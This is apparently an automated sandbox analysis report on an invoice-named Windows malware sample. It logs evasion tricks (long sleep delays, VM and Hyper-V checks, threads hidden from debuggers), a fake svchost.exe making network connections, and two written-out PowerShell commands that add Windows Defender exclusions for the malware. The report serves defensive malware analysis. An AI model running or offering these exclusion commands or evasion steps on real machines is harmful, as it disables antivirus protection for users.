Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Section loaded: OutputDebugStringW count: 1933
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Section loaded: OutputDebugStringW count: 3875

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4663	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 422

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe TID: 6220	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe TID: 6328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7004	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: powershell.exe, 00000008.00000003.847824148.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.950929748.0000000004BC4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.686038802.00000236B1740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.730738745.00000189C4740000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.752399716.0000024F07890000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.818024782.0000026433400000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.962962123.0000000005F00000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000008.00000003.847824148.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.950929748.0000000004BC4000.00000004.00000001.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 00000015.00000002.923478543.0000000001098000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
Source: svchost.exe, 0000000D.00000002.813320740.00000264324EB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000D.00000002.812364542.0000026432471000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWpN2d
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.686038802.00000236B1740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.730738745.00000189C4740000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.752399716.0000024F07890000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.818024782.0000026433400000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.962962123.0000000005F00000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.686038802.00000236B1740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.730738745.00000189C4740000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.752399716.0000024F07890000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.818024782.0000026433400000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.962962123.0000000005F00000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000015.00000002.923478543.0000000001098000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Files=CA
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.686038802.00000236B1740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.730738745.00000189C4740000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.752399716.0000024F07890000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.818024782.0000026433400000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.962962123.0000000005F00000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000019.00000002.917267394.0000000000644000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o8

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_0040289F

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Network Connect: 104.21.71.230 80
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Network Connect: 172.67.172.17 80

Adds a directory exclusion to Windows Defender

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
